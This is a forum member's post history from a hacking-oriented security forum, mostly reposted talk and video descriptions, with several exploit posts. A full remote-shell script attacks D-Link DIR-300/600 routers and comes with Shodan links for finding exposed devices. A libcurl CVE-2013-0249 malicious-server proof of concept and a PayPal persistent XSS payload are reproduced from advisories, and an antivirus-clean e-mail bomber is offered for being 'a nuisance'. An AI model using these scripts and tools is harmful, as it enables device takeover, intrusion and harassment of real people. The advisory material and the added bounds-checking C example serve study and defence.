
Praetorian503

Active Members
  • Posts: 578
  • Days Won: 5

Everything posted by Praetorian503

  1. Description: In this episode of TekTip, I am going to show a unique method to drive traffic to your honeypot. While I use Kippo as the example, this approach will work for any honeypot. If you have any other tips or tricks like this, let me know by leaving a comment or sending me an email at 1aN0rmus@TekDefense.com. TekDefense - News. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Tektip Ep21 - Drive Traffic To Your Honeypot
  2. Screenshot: -About: Praetorian503. Date: 10.February.2013. Hour: 4:33:10 PM. Size: 250 KB (256,000 bytes). Size on disk: 252 KB (258,048 bytes). -Options: E-mail Bomber (Set Interval (you can set a very fast interval)); E-mail Sender; G-mail Bomber. How does it work? -File Scanned: -Results: Detection rate: 0 on 14 (0%). Status: CLEAN. Download Link: Mediafire.com. PS: Made out of boredom... Maybe it's useful to someone who wants to become a nuisance.
  3. Description: HackMe Credit is my first hackme project. I'm showing some hacking skills there... Some of the examples in this hackme project are taken from real cases. Project Codes: hackmecredit - Vulnerable Web Application - Google Project Hosting. This video shows an unsecured MD5 encryption method. Tools used: HCON STF. Music: Balkan Beat Box - Move It. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Hackmecredit - Unsecured Encryption
  4. I say it's simpler to write Brazzers. PS: Better if they had made it so we had to write 3,14z2.
  5. Description: HackMe Credit is my first hackme project. I'm showing some hacking skills there... Some of the examples in this hackme project are taken from real cases. Project Codes: hackmecredit - Vulnerable Web Application - Google Project Hosting. Tools used: HCON STF. Music: Infected Mushroom - Project 100. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Hackme Credit - Hacking Showoff
  6. Description: All ethical hackers know the "blocked IP" problem: when we try to brute force a site and the site blocks our IP address... So I thought about a solution for this problem and I made this video about it. Tools used: My Scripts. Music: djsn0w - December 10 2011. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Multi Ip Threaded Tor Bruteforce - Poc
  7. If they had given you the password encrypted, what would you have done? The password works, it's just that you wrote it with a lowercase "l" or you copy/pasted it. Write exactly: Level-23.bizlol1 ON: Thanks.
  8. In that case all that's left is to say our prayers or chip in together for an attack :))
  9. ON Topic: Welcome! Take a look here: the Forum Rules. And very important: Advice from an old man for our young hackers. OFF Topic: Nice index, but not really. It's ridiculous to put "Hacked by vasile". That only draws the attention of kids, not of people with their heads on their shoulders (just a piece of advice). @Reckon You're already mentally ill, so I'm not taking you seriously. Talk to this _|_
  10. Description: securitytube, hacking, hackers, information security, convention, computer security, defcon-20, defcon-2012. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Uncovering Sap Vulnerabilities: Reversing And Breaking The Diag Protocol
  11. Description: In this video I will show you how to detect all the information about server security scripts or tools using the WhatWeb tool. The WhatWeb tool was developed by urbanadventurer aka Andrew Horton from Security-Assessment.com. In this demo I will show you the usage of some useful options. More Information: WhatWeb. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Whatweb - Next Generation Web Scanner
  12. Description: In this video I will show you how to crack WPA2 encryption using the Pyrit cracker tool. Why Pyrit? Pyrit is a very powerful and fast Wi-Fi cracking tool. Pyrit allows creating massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time tradeoff. Exploiting the computational power of many-core and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols. Source More Information: pyrit - WPA/WPA2-PSK and a world of affordable many-core platforms - Google Project Hosting. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Crack Wpa-2 Using Pyrit
  13. Description: The 4.9 GHz Public Safety Band has been deployed to a town near you! Police, Emergency Medical, and even Critical Infrastructure (power plants, etc.) maintain wireless networks on this seemingly 'hidden' band -- but what's actually there? How can you identify and monitor these networks? Stop by and find out the answers to those questions and more! Robert Potvliet heads Foundstone's wireless service line. Brad Antoniewicz works in Foundstone's open security research division to uncover flaws in popular technologies. He is a contributing author to both the Hacking Exposed and Hacking Exposed: Wireless series of books and has authored various internal/external Foundstone tools, whitepapers, and methodologies. Twitter: @foundstone. Open Security Research. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: The Safety Dance - Wardriving The Public Safety Band
  14. Description: The PSTN as you know it is changing. In March of 2012, the NSA announced "Project Fishbowl", a reference architecture for secure mobility VoIP usage on smartphones using WiFi or 3GPP networks. At the same time, mobile carriers in the US (seemingly) ensure that subscribers must purchase voice plans on their smartphones and can't opt for data-only plans, which curtails a compelling option of purchasing a smartphone for data-only usage, such as VoIP. Other mysterious clues abound. Since the mid-to-late 90s, users have been able to host their own web and email servers using open standards and DNS for advertisement, peering directly between domains and systems. At the same time, since the early 2000s, the technology and protocols have existed for enabling direct VoIP peering between enterprises, bypassing the PSTN, using DNS SRV records and ENUM, the same way we've been using DNS for HTTP and SMTP for years. But why is this seemingly attractive option for cost savings and collaboration not more widely adopted? Surely this is the way VoIP was meant to be used? Or isn't it? In this talk, we will explore the so-called market buzz of "UC Federation". Rather, we will kick this term to the bit bucket, and present an overview of how the industry is deploying these solutions technically. We will take a closer look at the security of being able to use UC between organizations, advertised using DNS, the same way that companies use UC internally for VoIP, HD Video, data sharing, IM & Presence, and collaboration applications.

      This talk is divided into three sections. First, we'll share our research on the state of public SIP peering using DNS SRV. Is SIP peering proliferating? How? What does it mean? Using a PoC research tool, we'll look at some initial data we've found, in order to plot the increase of peering using DNS SRV records for SIP service location advertisement. Second, we will show the audience findings from our UC "Federation" Honeypot research project. We've built a UC solution using a large commercial vendor, and have tested "Federation" with the help of the Global Federation Directory. Just to see what would happen. We've also set up a network of cloud based UC Federation honeypots using open source software, to explore attacks against UC Federation Systems. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: The End Of The Pstn As You Know It
  15. Cool PDF Reader version 3.0.2.256 buffer overflow exploit. Link: PacketStorm. PS: The file is too large and does not fit in the post.
  16. This exploit demonstrates the remote root vulnerability discovered by Michael Messner in D-Link DIR-300 and DIR-600 devices.

```python
#!/usr/bin/env python3
# D-LINK TOTAL FAIL
# http://www.s3cur1ty.de/m1adv2013-003
# Another Shit PoC by infodox
# SHODANS BELOW
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
# Who knew a shell could be so easy?
import os
import sys

import requests

if len(sys.argv) != 3:
    print("Usage: ./dlinkroot.py <target> <mode>")
    print("Modes: shell or telnetenable")
    print("I was lazy so I assume you have a telnet client")
    sys.exit(0)

target = sys.argv[1]
mode = sys.argv[2]


def shell(target):
    """Interactive loop: each line typed is POSTed unauthenticated as
    cmd=<line>; to command.php and the device's output printed back."""
    print("[+] Connecting and spawning a shell...")
    while True:
        try:
            bobcat = input("%s:~# " % target)
            lulz = "cmd=%s;" % bobcat
            url = "http://" + target + "/command.php"
            hax = requests.post(url, lulz)
            print(hax.text)
        except KeyboardInterrupt:
            print("\n[-] Quitting")
            sys.exit(1)


def telnetenable(target):
    """Start telnetd on the device through the same handler, then connect."""
    lulz = "cmd=telnetd;"
    url = "http://" + target + "/command.php"
    print("[+] Trying to enable telnet")
    try:
        hax = requests.post(url, lulz)
        print(hax.text)
    except Exception:
        print("[-] IT FAILED IT!")
        sys.exit(0)
    print("[+] Doing a telnet")
    try:
        os.system('telnet %s' % target)  # format the command before calling os.system
    except Exception:
        print("[-] IT FAILED IT!")
        sys.exit(1)


if mode == "shell":
    shell(target)
elif mode == "telnetenable":
    telnetenable(target)
else:
    print("[] WHAT THE FUCK YOU'RE DOING IT WRONG!")
```

Source: PacketStorm
  17. Description: In this video I will show you how to perform a brute-force attack on a Windows system and, once you have the password, use that password to get the shell. For this process we are using two tools: for the brute-force attack we are using acccheck, and for the shell keimpx. Very easy to use: if all the credentials are correct then you have the shell. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Attack On Windows For The Shell
  18. Description: In this video I will show you how to use the smbexec tool. Smbexec is a pass-the-hash tool: if you have the hash or the plain text password, you can exploit the Windows system using this tool. This tool will generate a backdoor, upload it to the victim machine and run it, so on the other side you will get the Meterpreter shell. AV detection chances are low. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Smbexec Tool Usage
  19. Description: The Internet of Things... It is coming. Wearing hardware that communicates across the Internet is starting to become a reality, chips are getting smaller, and as a society we are connected all the time... Building these devices is easier than we thought; putting them onto a network that is ours... EVEN BETTER! Come experience the Darknet of Things. Learn what we built, how we built it, and why. Learn how to get involved with a new community project, see what some of the DEF CON groups have been working on. Most importantly, learn how you can connect to the Darknet of Things. Anch - Just a lowly hacker out in Oregon, POC for DC503, Designer of the Network, and happily connected to the matrix. Twitter: @boneheadsanon. The Darknet of Things | Making things that do our bidding. Omega - Hardware hacker extraordinaire. Member of DC503, Designer of things, and thinks he should have taken the RED pill. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: The Darknet Of Things, Building Sensor Networks That Do Your Bidding
  20. Description: All brand new tool additions to the Google Hacking Diggity Project - The Next Generation Search Engine Hacking Arsenal. As always, all tools are free for download and use. When last we saw our heroes, the Diggity Duo had demonstrated how search engine hacking could be used to take over someone's Amazon cloud in less than 30 seconds, build out an attack profile of the Chinese government's external networks, and even download all of an organization's Internet facing documents and mine them for passwords and secrets. Google and Bing were forced to hug it out, as their services were seamlessly combined to identify which of the most popular websites on the Internet were unwittingly being used as malware distribution platforms against their own end-users. Now, we've traveled through space and time, my friend, to rock this house again... Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Tenacious Diggity: Skinny Dippin' In A Sea Of Bing
  21. Hello, Welcome! OffTopic: Why did you choose to present yourself now?
  22. A remotely exploitable buffer overflow vulnerability was discovered in the libcurl POP3 and SMTP protocol handlers. Proper exploitation can allow for arbitrary code execution.

      cURL buffer overflow
      Wed 06 February 2013

      Volema found a remotely exploitable buffer overflow vulnerability in the libcurl POP3 and SMTP protocol handlers which leads to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack. Vendor notified, CVE-2013-0249 released.

      Attack Concept Outline

      We have the permissions to send custom HTTP requests with curl. We send a request to our http://evilserver.com/

          GET / HTTP/1.0
          Host: evilserver.com

      The server answers with

          HTTP/1.0 302 Found
          Location: pop3://x:x@evilserver.com/

      "Smart" curl interprets the redirect and connects to evilserver.com port 110/TCP using the POP3 protocol. The server answers

          +OK POP3 server ready

      curl sends CAPA; the server answers with DIGEST-MD5 only:

          +OK List of capabilities follows
          SASL DIGEST-MD5
          IMPLEMENTATION dumbydumb POP3 server
          .

      So libcurl has to send AUTH DIGEST-MD5, then the server sends the payload

          + cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=

      and the overflow happens because of the fixed realm buffer size:

          realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8

      How it looks in gdb:

          Program received signal SIGSEGV, Segmentation fault.
          0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
          (gdb) bt
          #0 0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
          #1 0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message () from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
          #2 0x4141414141414141 in ?? ()
          ...
          #1469 0x4141414141414141 in ?? ()
          #1470 0x656d616e72657375 in ?? ()
          Cannot access memory at address 0x7fff63b8b000

      Original exploit: pop3d.py

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# curl pop3 CVE-2013-0249 by Volema/MSLC
import base64
import socket

host = "localhost"
port = 110

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
sock, addr = s.accept()
sock.send(b'+OK POP3 server ready\n')

while True:
    buf = sock.recv(1024)
    print(buf)
    if buf.find(b'USER') > -1:
        sock.send(b'+OK\n')
    if buf.find(b'PASS') > -1:
        sock.send(b'-ERR 999\n')
    if buf.find(b'CAPA') > -1:
        # advertise DIGEST-MD5 as the only SASL mechanism so libcurl has to use it
        resp = b'+OK List of capabilities follows\n'
        resp += b'SASL DIGEST-MD5\n'
        resp += b'IMPLEMENTATION dumbydumb POP3 server\n'
        resp += b'.\n'
        sock.send(resp)
    if buf.find(b'QUIT') > -1:
        sock.send(b'+OK')
        break
    if buf.find(b'AUTH') > -1:
        # a 128-byte realm overflows the fixed-size buffer in
        # Curl_sasl_create_digest_md5_message()
        realm = 'A' * 128
        payload = ('realm="%s",nonce="OA6MG9tEQGm2hh",qop="auth",'
                   'algorithm=md5-sess,charset=utf-8' % realm)
        resp = b'+ ' + base64.b64encode(payload.encode()) + b'\n'
        print(resp)
        sock.send(resp)

sock.close()
```

      Mitigation

      We recommend disabling protocols other than HTTP(S) in your application using the options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. The libcurl version should be updated.

      Source: PacketStorm
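The challenge exchange and the length check described above, as an added example that is not part of the original post and is not libcurl's or Volema's code: a toy C implementation of the DIGEST-MD5 challenge step. The server side builds the PoC's "+ <base64>" line with a realm of n bytes of 'A'; the client side decodes it and extracts the realm with a bounded parser that refuses anything that would not fit, terminator included, in a 128-byte buffer, which is the check the vulnerable function lacked. The challenge format, the 128-byte realm and the nonce are taken from the post; the function names, the other buffer sizes and the base64 helpers are this example's own assumptions, not libcurl internals.

```c
/* Added example, not libcurl's or Volema's code: a toy DIGEST-MD5 challenge
 * handler showing the bug class above (a server-chosen realm copied into a
 * fixed 128-byte stack buffer) with the bounds check that refuses it. The
 * format, the 128-byte realm and the nonce are from the post; all else is assumed. */
#include <stdio.h>
#include <string.h>

#define REALM_MAX 128
static const char B64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* base64 encode; returns output length, or -1 if out cannot hold it */
static int b64_encode(const unsigned char *in, size_t n, char *out, size_t outsz) {
    size_t i, o = 0;
    if (outsz < ((n + 2) / 3) * 4 + 1) return -1;
    for (i = 0; i < n; i += 3) {
        unsigned v = (unsigned)in[i] << 16 | (i + 1 < n ? (unsigned)in[i + 1] << 8 : 0)
                   | (i + 2 < n ? (unsigned)in[i + 2] : 0);
        out[o++] = B64[(v >> 18) & 63];
        out[o++] = B64[(v >> 12) & 63];
        out[o++] = i + 1 < n ? B64[(v >> 6) & 63] : '=';
        out[o++] = i + 2 < n ? B64[v & 63] : '=';
    }
    out[o] = '\0';
    return (int)o;
}

/* base64 decode, stopping at '='; returns decoded length, -1 on bad input or overflow */
static int b64_decode(const char *in, char *out, size_t outsz) {
    size_t o = 0; unsigned acc = 0; int bits = 0;
    for (; *in && *in != '='; in++) {
        const char *p = strchr(B64, *in);
        if (!p) return -1;
        acc = ((acc << 6) | (unsigned)(p - B64)) & 0xFFFFFF;
        if ((bits += 6) < 8) continue;
        bits -= 8;
        if (o + 1 >= outsz) return -1;           /* bounded: never writes past out[] */
        out[o++] = (char)((acc >> bits) & 0xFF);
    }
    out[o] = '\0';
    return (int)o;
}

/* find key="value" in realm="x",nonce="y",...; returns the value and its length */
static const char *quoted_value(const char *ch, const char *key, size_t *len) {
    size_t k = strlen(key);
    const char *p = ch, *end;
    while ((p = strstr(p, key)) != NULL) {
        if ((p == ch || p[-1] == ',') && p[k] == '=' && p[k + 1] == '"') {
            if ((end = strchr(p + k + 2, '"')) == NULL) return NULL;
            *len = (size_t)(end - (p + k + 2));
            return p + k + 2;
        }
        p += k;
    }
    return NULL;
}

/* Bounded realm extraction. Without the `len >= realmsz` test this is the vulnerable
 * pattern: a 128-byte realm plus its NUL copied past the end of a 128-byte stack
 * buffer, the smash in the backtrace above. Refuse it; do not silently truncate. */
static int parse_realm_checked(const char *ch, char *realm, size_t realmsz) {
    size_t len;
    const char *v = quoted_value(ch, "realm", &len);
    if (!v) return -1;
    if (len >= realmsz) return -2;               /* server-chosen length exceeds our buffer */
    memcpy(realm, v, len);
    realm[len] = '\0';
    return 0;
}

/* server side, as the PoC does it: "+ " + base64(challenge) with an n-byte realm of 'A' */
static int build_challenge_line(size_t n, char *line, size_t linesz) {
    char ch[512], a[257];
    if (n > 256 || linesz < 3) return -1;
    memset(a, 'A', n); a[n] = '\0';
    int m = snprintf(ch, sizeof ch, "realm=\"%s\",nonce=\"OA6MG9tEQGm2hh\",qop=\"auth\","
                     "algorithm=md5-sess,charset=utf-8", a);
    if (m < 0 || (size_t)m >= sizeof ch) return -1;
    memcpy(line, "+ ", 2);
    return b64_encode((const unsigned char *)ch, (size_t)m, line + 2, linesz - 2) < 0 ? -1 : 0;
}

/* client side: decode "+ <base64>", extract the realm; 0 ok, -1 malformed, -2 too long */
static int handle_challenge_line(const char *line, char *realm, size_t realmsz) {
    char ch[512];
    if (strncmp(line, "+ ", 2) != 0 || b64_decode(line + 2, ch, sizeof ch) < 0) return -1;
    return parse_realm_checked(ch, realm, realmsz);
}

/* one full exchange with an n-byte realm; returns the client's result code */
static int exchange_rc(size_t n) {
    char line[512], realm[REALM_MAX];
    if (build_challenge_line(n, line, sizeof line) != 0) return -1;
    return handle_challenge_line(line, realm, sizeof realm);
}

int main(void) {
    printf("127-byte realm: rc=%d (accepted)\n", exchange_rc(127));
    printf("128-byte realm (the PoC payload): rc=%d (rejected)\n", exchange_rc(128));
    return 0;
}
```

The client returns -2 rather than truncating because a truncated realm would still let the server steer authentication, and a client that cannot represent the server's value should abort the SASL step. This covers the length-check half of the fix; the other half is the mitigation the post recommends, refusing to follow a redirect into pop3:// or smtp:// at all via CURLOPT_REDIR_PROTOCOLS, so that the challenge parser is never reached from an HTTP request.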
  23. Air Disk Wireless version 1.9 for iPad and iPhone suffers from local file inclusion and command injection vulnerabilities. Link: PacketStorm
  24. PayPal suffered from a cross site scripting vulnerability.

      Title:
      ======
      PayPal Bug Bounty #26 - Persistent Web Vulnerabilities

      Date:
      =====
      2013-01-26

      References:
      ===========
      http://www.vulnerability-lab.com/get_content.php?id=703
      PayPal UID: wam19c8kxn

      VL-ID:
      =====
      703

      Common Vulnerability Scoring System:
      ====================================
      4.5

      Introduction:
      =============
      PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4-9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

      (Copy of the Homepage: www.paypal.com)
      [http://en.wikipedia.org/wiki/PayPal]

      Abstract:
      =========
      The Vulnerability Laboratory Research Team discovered a persistent Web Vulnerability in the official Paypal Community Forum Portal website application.

      Report-Timeline:
      ================
      2012-09-17: Researcher Notification & Coordination
      2012-09-17: Vendor Notification
      2012-10-22: Vendor Response/Feedback
      2012-12-14: Vendor Fix/Patch
      2013-01-26: Public Disclosure

      Status:
      ========
      Published

      Affected Products:
      ==================

      Exploitation-Technique:
      =======================
      Remote

      Severity:
      =========
      Medium

      Details:
      ========
      A persistent web vulnerability is located in the official Paypal Community Forum Portal website application. The bug allows remote attackers with a low privileged application user account to inject their own malicious persistent script code via the editor. The vulnerabilities are located in the forum editor module with the bound vulnerable messageform & tag values. Remote attackers can compose malicious forum posts to hijack admin/moderator/customer accounts via the editor spell checker function. Successful exploitation results in local persistent web context manipulation, client side phishing or persistent session hijacking via the message body.

      Vulnerable Module(s):
      [+] Editor (in combination with the replace all function to execute)

      Vulnerable Parameter(s):
      [+] Message & Tags

      Proof of Concept:
      =================
      The persistent vulnerability can be exploited by remote attackers with a low privileged community account and with low or medium required user interaction. For demonstration or reproduce ...

      Review: Editor Listing - Link & Spell Replace > Execution

      <p>>"<<span style="" id="jS$6" class="j2">"></span> <span style="" id="jS$7" class="j2">"><iframe src="a" onload="alert("VL")" <"=""><[PERSISTENT INJECTED SCRIPT CODE!]) <</iframe></span> =<span id="jS$12" class="j2">http</span>://<span id="jS$9" class="j2">global</span>-<span id="jS$10" class="j4">evolution.info </span>/><span id="jS$11" class="j4">@gmail.com</span>

      Session Time: 17:30 - 18:00
      URL: https://www.paypal-community.com/t5/forums/postpage/board-id/US-Protections

      Risk:
      =====
      The security risk of the persistent web vulnerability is estimated as medium(+)|(-)high.

      Credits:
      ========
      Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

      Disclaimer:
      ===========
      The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

      Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
      Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
      Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
      Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
      Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

      Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

      Copyright © 2012 | Vulnerability Laboratory

      --
      VULNERABILITY RESEARCH LABORATORY
      LABORATORY RESEARCH TEAM
      CONTACT: research@vulnerability-lab.com

      Source: PacketStorm